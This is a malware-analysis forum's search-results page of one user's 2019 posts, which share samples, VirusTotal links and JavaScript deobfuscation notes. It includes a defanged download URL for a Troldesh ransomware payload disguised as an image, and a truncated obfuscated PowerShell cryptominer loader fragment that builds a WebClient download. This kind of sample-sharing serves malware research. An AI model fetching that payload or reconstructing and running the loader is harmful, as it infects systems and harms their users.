Search found 13 matches

by hackr8
Sat Jan 19, 2019 10:59 am
Forum: Malware
Topic: DDoS.Win32.Meganuke
Replies: 0
Views: 48

DDoS.Win32.Meganuke

Ddos trojan
VirusTotal: https://www.virustotal.com/#/file/965fe ... /detection
I haven't managed to any other information so I guess that it is a really rare sample.
by hackr8
Fri Jan 18, 2019 9:33 pm
Forum: Reverse Engineering and Debugging
Topic: Reversing Javascript Help
Replies: 3
Views: 120

Re: Reversing Javascript Help

Now I am getting even closer to revealing the full code. Do you mind sending me a copy of the original html though? For research purposes, of course.
by hackr8
Fri Jan 18, 2019 5:48 pm
Forum: Malware
Topic: Ransom/Shade (alias Troldesh, BetterCallSaul)
Replies: 12
Views: 15321

Re: Ransom/Shade (alias Troldesh, BetterCallSaul)

New appearance of Troldesh.A:
Download (dangerous):
hxxp://tecnologiaz.com/wp-content/themes/envo-magazine/fonts/ssj.jpg
Virustotal: https://www.virustotal.com/#/file/b62fc ... /detection
by hackr8
Thu Jan 17, 2019 3:51 pm
Forum: Malware
Topic: Trojan.JS.Delsys.A
Replies: 0
Views: 49

Trojan.JS.Delsys.A

Attempts to delete system files.
Virustotal: (39/56)
https://www.virustotal.com/#/file/a502c ... /detection
by hackr8
Thu Jan 17, 2019 11:49 am
Forum: Malware
Topic: Virus on torrent. Cryptominer.
Replies: 1
Views: 104

Re: Virus on torrent. Cryptominer.

Raw code: powershell.exe -NoPr -WINd 1 -eXEc ByP iex ("$( SeT-ITeM 'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101 AV detection: https://www.virustotal.com/#/file/9e5a3e591d0df398c90484f792a3...
by hackr8
Thu Jan 17, 2019 10:31 am
Forum: Reverse Engineering and Debugging
Topic: Reversing Javascript Help
Replies: 3
Views: 120

Re: Reversing Javascript Help

Well, I actually found the strings. Here is the light you asked for: "onmouseover", "pkcs11", "textarea", "form", "packages", "toString", "confirm", "while", "mimeTypes", "defaultStatus", "parseFloat", "top", "onmousedown", "return", "closed", "fromCharCode", "function", "abstract", "window", "doubl...
by hackr8
Thu Jan 17, 2019 10:21 am
Forum: Reverse Engineering and Debugging
Topic: Reversing Javascript Help
Replies: 3
Views: 120

Re: Reversing Javascript Help

I believe that this code was produced by a js obfuscator. The array 'b4c45a' contains some strings that are encoded in hex and seperated with quotes like " (with some indentations that i can add only manually) The other variables call parts of the content of the first array. Now, if you take t...
by hackr8
Fri Jan 11, 2019 3:41 pm
Forum: Malware
Topic: PUA FusionCore
Replies: 0
Views: 119

PUA FusionCore

A sample I found in the wild a few days ago. After a small research I found the following information: Microsoft classified this as: PUA:Win32/FusionCore It might be a variant of Install Core. Contains Adware/Bloatware. Installer made with NullSoft. VirusTotal:https://www.virustotal.com/#/file/d7dea...
by hackr8
Fri Jan 11, 2019 3:03 pm
Forum: Malware
Topic: Trojan-000.exe
Replies: 3
Views: 1851

Re: Trojan-000.exe

Helpful links:
Removal(rootabx) : https://youtu.be/vDW8KsztTMY
Removal:(PandoTech):https://www.youtube.com/watch?v=Te2PT2w-2bs
Making Of and DL(FlyTech Videos): https://www.youtube.com/watch?v=e_TYnADDsLQ (Warning!!! There is link to harmful content in the description of the video)
by hackr8
Fri Jan 11, 2019 2:44 pm
Forum: Malware
Topic: Win32/CoinMiner (Valhalla)
Replies: 3
Views: 285

Re: Help! Unknown malware.

But how did you find the source code? It is obvisously obfuscated. CodeReflect gave me this when I tried to decompile it: Shared Sub NULL-SHIELD_Stop-unpacking-this-tool||You_can_not_unpack_this_programáâãäåæçèéêë7qìKîïðñ7qóôõö÷øùNULL-SHIELD_Stop-unpacking-this-tool-<Module>You_can_not_unpack_this_...